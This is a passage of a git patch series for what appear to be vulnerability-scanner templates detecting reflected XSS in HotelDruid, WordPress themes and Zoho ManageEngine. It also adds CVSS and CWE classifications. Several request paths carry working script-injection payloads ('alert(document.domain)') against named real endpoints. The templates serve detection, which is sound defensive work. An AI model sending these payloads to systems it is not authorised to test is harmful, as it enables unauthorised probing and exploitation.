'{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1' + - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From 9b31b064938690456cb7f5f91c13104d3a0334bc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:29:49 +0000 Subject: [PATCH 336/339] Auto Generated CVE annotations [Thu Sep 16 17:29:49 UTC 2021] :robot: --- cves/2021/CVE-2021-24364.yaml | 5 +++++ cves/2021/CVE-2021-24407.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml index b4f2434d35..61d31c4a48 100644 --- a/cves/2021/CVE-2021-24364.yaml +++ b/cves/2021/CVE-2021-24364.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24364 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index 98f6fd96aa..6a5f152f5c 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24407 + cwe-id: CWE-79 requests: - raw: From 0c18bafa42a419297226381af15e1a7373d7b715 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:31:46 +0000 Subject: [PATCH 337/339] Auto Generated CVE annotations [Thu Sep 16 17:31:46 UTC 2021] :robot: --- cves/2021/CVE-2021-37833.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index 4b98f8b51a..74f7def049 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml @@ -9,6 +9,11 @@ info: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 tags: cve,cve2021,hoteldruid,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37833 + cwe-id: CWE-79 requests: - method: GET From 631005ebaa31f2fad8463f6bf299c3975f0b390b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 23:03:45 +0530 Subject: [PATCH 338/339] Update CVE-2018-12998.yaml --- cves/2018/CVE-2018-12998.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index fdc71f0e37..234ee0dcdd 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml @@ -7,23 +7,21 @@ info: description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. reference: - https://github.com/unh3x/just4cve/issues/10 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html - tags: cves,cve2018,zoho,xss + - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 + tags: cve,cve2018,zoho,xss requests: - method: GET path: - - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111" - headers: - Content-Type: application/x-www-form-urlencoded + - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - "" part: body - type: status @@ -31,6 +29,6 @@ requests: - 200 - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html From fdc98d1405717662a4a0a4cb027aa9d8b666ef17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:39:06 +0000 Subject: [PATCH 339/339] Auto Generated CVE annotations [Thu Sep 16 17:39:06 UTC 2021] :robot: --- cves/2018/CVE-2018-12998.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index 234ee0dcdd..276fbcff83 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml @@ -10,6 +10,11 @@ info: - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 tags: cve,cve2018,zoho,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-12998 + cwe-id: CWE-79 requests: - method: GET